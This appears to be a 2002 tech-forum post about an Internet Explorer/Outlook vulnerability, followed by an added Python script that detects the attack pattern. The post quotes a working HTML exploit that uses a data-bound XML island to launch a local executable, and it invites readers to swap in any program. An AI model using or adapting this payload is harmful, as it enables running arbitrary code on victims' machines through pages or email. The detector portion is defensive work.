


Another IE/Outlook Hole

lokem
03-06-2002, 02:44 AM
The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

Read the rest here:

http://www.theregister.co.uk/content/4/24274.html

The article also has a simple fix for this problem.

Here's the simple script:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>


Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
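A defensive check for the pattern in the snippet above (an element bound with dataformatas="html" to an XML data island whose field carries an <object> tag), added here as an example that is not part of the original post. The function names and finding fields are hypothetical, and the regex matching only approximates how a browser parses the markup.

```python
import re
from html import unescape

ATTR = re.compile(r'([\w:-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
TAG = re.compile(r'<(\w+)\b([^>]*)>')
ISLAND = re.compile(r'<xml\b([^>]*)>(.*?)</xml\s*>', re.I | re.S)
CDATA = re.compile(r'<!\[CDATA\[(.*?)\]\]>', re.S)
LOCAL = re.compile(r'^(?:[a-z]:[\\/]|\\\\|file:)', re.I)  # drive, UNC or file: URL

# Constructed sample with the same structure as the snippet in the post.
SAMPLE = '''<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
 codebase="c:/windows/system32/calc.exe"></object>
]]></exploit></security></xml>'''

def attrs(raw):
    """Parse a tag's attribute text into a dict with lower-cased names."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR.finditer(raw)}

def find_databound_objects(doc):
    """Report <object> tags delivered through an HTML-formatted data binding."""
    islands = {}
    for m in ISLAND.finditer(doc):
        island_id = attrs(m.group(1)).get("id")
        if island_id:
            islands[island_id.lower()] = m.group(2)
    findings = []
    for m in TAG.finditer(doc):
        a = attrs(m.group(2))
        field = a.get("datafld", "")
        body = islands.get(a.get("datasrc", "").lstrip("#").lower())
        if a.get("dataformatas", "").lower() != "html" or not field or body is None:
            continue
        fm = re.search(r'<{0}\b[^>]*>(.*?)</{0}\s*>'.format(re.escape(field)), body, re.I | re.S)
        if not fm:
            continue
        # Field content may sit in CDATA or be entity-escaped; normalise both.
        markup = "".join(CDATA.findall(fm.group(1))) + unescape(CDATA.sub("", fm.group(1)))
        for om in TAG.finditer(markup):
            if om.group(1).lower() == "object":
                codebase = attrs(om.group(2)).get("codebase", "")
                findings.append({"bound_tag": m.group(1).lower(), "datafld": field,
                                 "codebase": codebase, "local_path": bool(LOCAL.match(codebase))})
    return findings

if __name__ == "__main__":
    for f in find_databound_objects(SAMPLE):
        print(f)
```

A mail gateway or proxy filter could run this over HTML bodies and quarantine any message with a finding, treating `local_path` as the higher-severity case.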

Copyright © 1998-2008 TechSpot.com. TechSpot is a registered trademark. All Rights Reserved.